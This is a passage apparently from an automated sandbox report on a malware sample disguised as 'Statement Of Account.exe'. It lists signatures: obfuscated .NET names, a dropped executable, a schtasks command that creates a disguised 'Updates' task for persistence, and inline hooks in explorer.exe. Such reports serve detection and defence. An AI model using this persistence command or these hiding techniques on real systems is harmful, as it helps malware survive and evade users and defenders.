Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, UZ9qWJD1Wm6HGuskXY.cs High entropy of concatenated method names: 'MuxMSRIqLf', 'eoAMt7Bf3x', 'ToString', 'z4ZMgtlE6w', 'qi8MvO2l3Q', 'M5SM6Oc8xJ', 'oEcMTp3ZPV', 'sU0MbiX6NP', 'uORMC1EheX', 'mghMlaaqJi'
Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, W7eOYc6mPKkSUdZ3uK.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'm6vhmyEc8U', 'jPmhauc7Tw', 'iruhzclfhq', 'vKxLwVGDsP', 'JM3Ls5bQTN', 'KLwLh5M3fb', 'RgbLLgVK73', 'GxIJyZqufdqH2nZOs2A'
Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, lu1UrfsLPxGyI9Nnu1R.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wvGfWtnNM5', 'Lmhfq335DW', 'q4vfiq4ZXL', 'mXPfDpR7K3', 'M6efYX4oOZ', 'mVHfuybBbm', 'fFVfjwAtBj'
Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, MnUDt3mjFUoMxNxTsw.cs High entropy of concatenated method names: 'wFBcBTIJfC', 'vFkcXDm3at', 'nlrc9wGx7x', 'WOGcJO0prD', 'J7DcW0lxRi', 'oo2cVoGcMv', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, Bcn4S3hlHm4ofn0hWj.cs High entropy of concatenated method names: 'GDEHxgDGA', 'tYj5dHTDg', 'JNoeq4kWd', 'g5t8HqLSZ', 'YBUIgkyS1', 'UjZZk3M4o', 'ql6t42cGZ0WDyn0MLS', 'bCHSOedbw4bS5XncxO', 'auYc4Z6cj', 'VXGfx1i9m'
Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, IINHKBNMRCCi1qwcT4.cs High entropy of concatenated method names: 'g3psCh6ggw', 'zWjsl9TAIW', 'RyxsSOpt3s', 'rd2stT1CJ0', 'v08so1KPlL', 'wrwsyg4x55', 'iwioIk0swFUEZBibht', 'pQqv78jX3pgowug16i', 'GN4ssNUZeQ', 'b3gsL2P2Ja'
Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, zWJJGGvxAwIgbu8YWv.cs High entropy of concatenated method names: 'Dispose', 'cLPsm1QABu', 'JrdhXYY10i', 'Eu711fIRHP', 'aQLsa6tORB', 'u4iszNhhYx', 'ProcessDialogKey', 'a5nhwnUDt3', 'VFUhsoMxNx', 'hswhhUKk7y'
Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, y8skBgpa9DSqAAHi65.cs High entropy of concatenated method names: 'wXxCMBhITq', 'iSNCFpQWTu', 'TmGCykQv91', 'pGbVCy6fmRrj8w83J3B', 'HX57Yr6dij3cDcw8nZE', 'KGslbe62CCecrUoAl2Q'
Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, KlLQrwBg4x55Bf4v3j.cs High entropy of concatenated method names: 'hshbUAEa38', 'BOtbvG5rar', 'YW1bTDUetD', 'P1NbCLn0AI', 'xPublVLFwq', 'rkLTYjYuHM', 'eolTuOiEu1', 'HO7Tj2Mlgd', 'GgATGvvLUK', 'swMTmE533E'
Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, DNVkJFlCDXXcvsoDnF.cs High entropy of concatenated method names: 'GQCLU1fsBV', 'OggLgSfqfP', 'k6mLv8Wdpm', 'tLvL6mlKpe', 'M6iLTTDO5d', 'jdVLbZ7tSH', 'CHqLCehSyg', 'BXRLlYQvvA', 'FrZLE7YZD6', 'PO8LScWh16'
Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, uoIQEWIyxOpt3scd2T.cs High entropy of concatenated method names: 'q0c65vZu1H', 'lTh6ebi0b9', 'l5T6KLhHD3', 'tta6IraGW9', 'IRt6op2078', 'mwJ6yhIO7r', 'vwj6M2CwEQ', 'v9u6cEQGaY', 'uL26Fofc0L', 'tya6f8vOTy'
Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, Lh6ggwKHWj9TAIWXF7.cs High entropy of concatenated method names: 'bZTvW88oku', 'B2dvq6nDRs', 'dYWviVhG8n', 'lGRvD7C9SJ', 'msIvYjmoSw', 'cJbvuxMQR0', 'tuBvjL7PIo', 'DB1vGnChZg', 'wGEvmmajPa', 'gB1vaxe9Bb'
Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, c3OREwnQa3GNYU832f.cs High entropy of concatenated method names: 'EaXC2J1Xfr', 'q9PC0j1Kck', 'FR7CHFr0Yq', 'GKfC5vyv6g', 'cYYCRN9RVD', 'pieCeE21AL', 'XsQC8srmZf', 'xJJCKmrAax', 'N1MCIvjgZg', 'zSFCZjkWBc'
Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, eKk7ynaiv2Ji3kdDNx.cs High entropy of concatenated method names: 'bxqFskNs4A', 'J9gFLHpSnj', 'jpcFNWRTN6', 'hTuFggBc9P', 'jkeFvFY9Qr', 'R1DFTsoCBK', 'eKHFbg0uBg', 'wP7cjoMBvv', 'BBIcGdsMpL', 'jmDcmCqjoF'
Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, vaiTpIWP0Ndo0ZuNPf.cs High entropy of concatenated method names: 'CIlo3uUZUZ', 'C9doAcyHgg', 'TROoWBGsWm', 'CudoqFX6Q1', 'H8ToX9CNYF', 'y90o9Aw5ue', 'vseoJMmbmu', 'VWCoVvOFsG', 'aFsoPsXTUF', 'MXfoxfrLjf'
Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, h6IC2siSXaigkWxfxe.cs High entropy of concatenated method names: 'ToString', 'mn6ykMiSYS', 'mucyXXPffh', 'VnEy9UvwQp', 'hu7yJJjjyS', 'piAyV81VFy', 'eTyyPKh7j4', 'GBqyxI8Y4L', 'KhFypvEk8o', 'j8EyngdZ1j'
Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, taVahudoRs29QscL9X.cs High entropy of concatenated method names: 'vSe7KJ0EA2', 'waj7IRQ96c', 'GB47BX7vT7', 'HVS7XCJfIW', 'Q3w7JY2PRd', 'BSV7Vw2uBZ', 'Coo7xxFsvw', 'MM97pZdd8W', 'E4873BV1La', 'N717kAEdCD'
Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, FoLy8GswBljqbcaAATd.cs High entropy of concatenated method names: 'IO2F2vFQxi', 'GeSF0fhAIc', 'lI2FHDKJtR', 'aShF5GF4rh', 'n9mFRmsYhN', 'attFeXbRQ7', 'qaOF8gOZKj', 'jRfFKGpl92', 'AP4FIDSJok', 'qawFZXBVAy'
Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, vL6tORGBO4iNhhYxw5.cs High entropy of concatenated method names: 'lEUcgSVhVm', 'c1RcvQsPDR', 'NqLc6nZ1b9', 'DTWcTWbMZk', 'o6CcbG8qpS', 'GSxcCU9ntO', 'cQqclevKSr', 'eUbcEOyuIk', 'CiqcS7EQY0', 'gGactN4U3c'
Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, TtlxsAzSTRsL7Foskh.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'DatF7wtdUY', 'fHNFoj4Gc6', 'sTvFyYjGqo', 'k9cFMSVY0l', 'gBwFcrAsyQ', 'bEDFFmGWmG', 'MM5FfmHqty'
Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, UZ9qWJD1Wm6HGuskXY.cs High entropy of concatenated method names: 'MuxMSRIqLf', 'eoAMt7Bf3x', 'ToString', 'z4ZMgtlE6w', 'qi8MvO2l3Q', 'M5SM6Oc8xJ', 'oEcMTp3ZPV', 'sU0MbiX6NP', 'uORMC1EheX', 'mghMlaaqJi'
Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, W7eOYc6mPKkSUdZ3uK.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'm6vhmyEc8U', 'jPmhauc7Tw', 'iruhzclfhq', 'vKxLwVGDsP', 'JM3Ls5bQTN', 'KLwLh5M3fb', 'RgbLLgVK73', 'GxIJyZqufdqH2nZOs2A'
Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, lu1UrfsLPxGyI9Nnu1R.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wvGfWtnNM5', 'Lmhfq335DW', 'q4vfiq4ZXL', 'mXPfDpR7K3', 'M6efYX4oOZ', 'mVHfuybBbm', 'fFVfjwAtBj'
Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, MnUDt3mjFUoMxNxTsw.cs High entropy of concatenated method names: 'wFBcBTIJfC', 'vFkcXDm3at', 'nlrc9wGx7x', 'WOGcJO0prD', 'J7DcW0lxRi', 'oo2cVoGcMv', 'Next', 'Next', 'Next', 'NextBytes'
Drops PE files
Source: C:\Users\user\Desktop\Statement Of Account.exe File created: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Jump to dropped file

Boot Survival
barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\Statement Of Account.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SdYCcXyq" /XML "C:\Users\user\AppData\Local\Temp\tmp9A8F.tmp"

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xED
Source: C:\Users\user\Desktop\Statement Of Account.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
